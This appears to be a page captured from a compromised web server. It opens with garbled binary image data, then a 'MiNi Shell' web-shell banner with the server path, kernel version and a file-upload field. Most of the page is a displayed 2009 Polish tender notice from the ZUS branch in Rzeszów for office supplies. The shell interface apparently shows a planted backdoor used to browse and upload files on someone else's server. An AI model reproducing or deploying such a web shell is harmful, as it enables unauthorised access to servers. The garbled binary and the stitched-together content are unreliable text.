JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/59357-N-2009.html

<p class="kh_header"><b>Rzeszów: Dostawa artykułow biurowych dla O/ZUS w Rzeszowie w roku 2009</b><br>
<b>Numer ogłoszenia: 59357 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułow biurowych dla O/ZUS w Rzeszowie w roku 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów biurowych wyprodukowanych nie wcześniej niż 6 miesięcy przed terminem dostawy, szczegółowo wyspecyfikowanych w załączniku do części III SIWZ.
2. Ilości towaru określone w formularzu cenowym są ilościami maksymalnymi. Zamawiający może zmniejszyć ilości towaru stosownie do wystawionych zleceń.
3. Zamawiający dopuszcza możliwość składania ofert częściowych. Ilość części szczegółowo została określona w załączniku do części III SIWZ
UWAGA: Oferta musi być kompletna. Nieuwzględnienie,  chociażby jednej z zamawianych pozycji asortymentowych, spowoduje odrzucenie oferty.
4. Zamawiający dopuszcza możliwość przedstawienia w ofercie asortymentu równoważnego (innego niż podany z nazwy przez Zamawiającego w opisie przedmiotu zamówienia) pod warunkiem, że oferowany asortyment będzie co najmniej o takich samych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych.
5. Wykonawca jest zobowiązany przedstawić w ofercie w przypadku oferowania asortymentu (dotyczy załącznika do SIWZ Formularz cenowy):
5.1 identycznego jak wskazany przez Zamawiającego - należy wpisać np. zgodny z SIWZ lub pozostawić bez wypełnienia - dotyczy asortymentu, który Zamawiający wskazał z nazwy;
5.2 równoważnego dokładną nazwę handlową, typ i nazwę producenta oferowanego artykułu (na formularzu cenowym) oraz dołączyć kartę katalogową, etykietę asortymentu lub inny dokument (w języku polskim), itp., z których będzie wynikało, że oferowany artykuł: 
-	spełnia minimalne parametry określone przez Zamawiającego,
- 	charakteryzuje się co najmniej takimi samymi parametrami technicznymi, jakościowymi,funkcjonalnymi oraz użytkowymi w odniesieniu do asortymentu określonego przez Zamawiającego w formularzach cenowych (zob. też UWAGI w załączniku do SIWZ Formularz cenowy).
UWAGA: Zaoferowanie asortymentu sprzecznego z powyższymi wymaganiami skutkować będzie odrzuceniem oferty.
6. W całym okresie trwania umowy Wykonawca zobowiązany będzie dostarczać wyłącznie asortyment zgodny z oferowanym. 
7. Wykonawca zobowiązany będzie do dostarczania do siedziby Zamawiającego na własny koszt każdej zamówionej partii materiałów biurowych, 
a) w terminie jednego tygodnia (w godzinach pracy O ZUS Rzeszów) od dnia złożenia zamówienia pisemnie, telefonicznie, faksem lub drogą elektroniczną,
b) do jej rozładunku rozumianego jako wyładowanie ze środka transportu na terenie siedzibyZamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, tzn:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego 

Zamawiający dokona oceny spełniania warunków metodą 0 (nie spełnia) - 1 (spełnia) na podstawie złożonych dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków określonych w pkt. 1.1. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych oraz
1.1 na potwierdzenie warunku określonego w pkt. 1.1. a  przedstawi:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, 
1.2. na potwierdzenie spełnienia warunku określonego w pkt. 1.1.d  Wykonawca złoży oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych oraz:
1.2.1  zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidzianą prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
1.2.2 zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów określonych w pkt. 1.1, 1.2.1. i 1.2.2 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.1. Dokument, o którym mowa w pkt. 2 lit. a), powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.2. Dokument, o którym mowa w pkt. 2. lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 2. lit. a) i b), Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy określone w pkt. 2.1. i 2.2. stosuje się odpowiednio.
3. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, wykonawca złoży (w przypadku oferowania artykułów równoważnych):kartę katalogową, etykietę asortymentu lub inny dokument (w języku polskim), itp., z których będzie wynikało, że oferowany artykuł: 
- spełnia minimalne parametry określone przez Zamawiającego,
- charakteryzuje się co najmniej takimi samymi parametrami technicznymi, jakościowymi, funkcjonalnymi oraz użytkowymi w odniesieniu do asortymentu określonego przez Zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al. Piłsudskiego 12, 35-075 Rzeszów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al. Piłsudskiego 12, 35-075 Rzeszów, pok. Nr 23 Dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zeszytów, skorowidzów, bloków szkolnych z makulatury, kostek zapisowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 22.81.62.00-5, 22.81.60.00-3, 22.85.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa długopisów, cienkopisów, flamastrów, wkładów do długopisu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.21.21-5, 30.19.21.25-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć III zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dziurkaczy, zszywaczy, nożyczek, klipów biurowych, zszywek biurowych, spinaczy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.21.50-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa segregatorów, skoroszytów, teczek PCV, koszulek foliowych, kalki maszynowej i ołówkowej, teczek wiązanych, fastykuł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.95.00-5, 30.19.91.10-4, 30.19.91.30-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa okładek do bindowania, grzbietów do bindownicy, linijek, gumek recepturek..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa gumek do mazania, kleju biurowego, korektorów, rolek kasowych, taśmy klejącej, tuszu do pieczątek..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com